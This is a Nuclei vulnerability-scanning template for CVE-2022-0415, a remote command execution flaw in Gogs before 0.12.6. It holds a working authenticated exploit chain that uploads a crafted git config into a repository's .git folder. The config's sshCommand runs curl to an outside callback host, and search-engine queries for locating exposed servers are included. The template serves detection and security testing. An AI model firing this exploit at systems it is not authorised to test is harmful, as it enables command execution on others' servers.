126 lines
4.2 KiB
YAML
126 lines
4.2 KiB
YAML
id: CVE-2022-0415
|
|
|
|
info:
|
|
name: Gogs <0.12.6 - Remote Command Execution
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
|
impact: |
|
|
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
|
|
remediation: Fixed in version 0.12.6.
|
|
reference:
|
|
- https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284
|
|
- https://huntr.dev/bounties/b4928cfe-4110-462f-a180-6d5673797902
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0415
|
|
- https://github.com/bfengj/CTF
|
|
- https://github.com/cokeBeer/go-cves
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2022-0415
|
|
cwe-id: CWE-434,CWE-20
|
|
epss-score: 0.11758
|
|
epss-percentile: 0.95304
|
|
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 6
|
|
vendor: gogs
|
|
product: gogs
|
|
shodan-query:
|
|
- cpe:"cpe:2.3:a:gogs:gogs"
|
|
- http.title:"sign in - gogs"
|
|
fofa-query: title="sign in - gogs"
|
|
google-query: intitle:"sign in - gogs"
|
|
tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /user/login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /user/login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
|
|
- |
|
|
GET /repo/create HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /repo/create HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on
|
|
- |
|
|
POST /{{username}}/{{randstr}}/upload-file HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: application/json
|
|
X-Requested-With: XMLHttpRequest
|
|
X-Csrf-Token: {{auth_csrf}}
|
|
Content-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395
|
|
|
|
-----------------------------313811965223810628771946318395
|
|
Content-Disposition: form-data; name="file"; filename="config"
|
|
Content-Type: application/octet-stream
|
|
|
|
[core]
|
|
repositoryformatversion = 0
|
|
filemode = true
|
|
bare = false
|
|
logallrefupdates = true
|
|
ignorecase = true
|
|
precomposeunicode = true
|
|
sshCommand = curl http://{{interactsh-url}} -I
|
|
[remote "origin"]
|
|
url = git@github.com:torvalds/linux.git
|
|
fetch = +refs/heads/*:refs/remotes/origin/*
|
|
[branch "master"]
|
|
remote = origin
|
|
merge = refs/heads/master
|
|
-----------------------------313811965223810628771946318395--
|
|
- |
|
|
POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- dns
|
|
- http
|
|
|
|
- type: word
|
|
part: body_1
|
|
words:
|
|
- content="Gogs
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrf
|
|
group: 1
|
|
regex:
|
|
- name="_csrf" value="(.*)"
|
|
internal: true
|
|
|
|
- type: regex
|
|
name: auth_csrf
|
|
group: 1
|
|
regex:
|
|
- name="_csrf" content="(.*)"
|
|
internal: true
|
|
|
|
- type: regex
|
|
name: uuid
|
|
group: 1
|
|
regex:
|
|
- ' "uuid": "(.*)"'
|
|
internal: true
|
|
# digest: 4a0a0047304502200d8ef6d64f56736b9f4df649e0b8a901e1a6c156d7d926865321279d635f17e4022100e580aba4cadd6840a8ca15efa3aaf5afc09849320cafadf6eecbfa672db2cb58:922c64590222798bb761d5b6d8e72950 |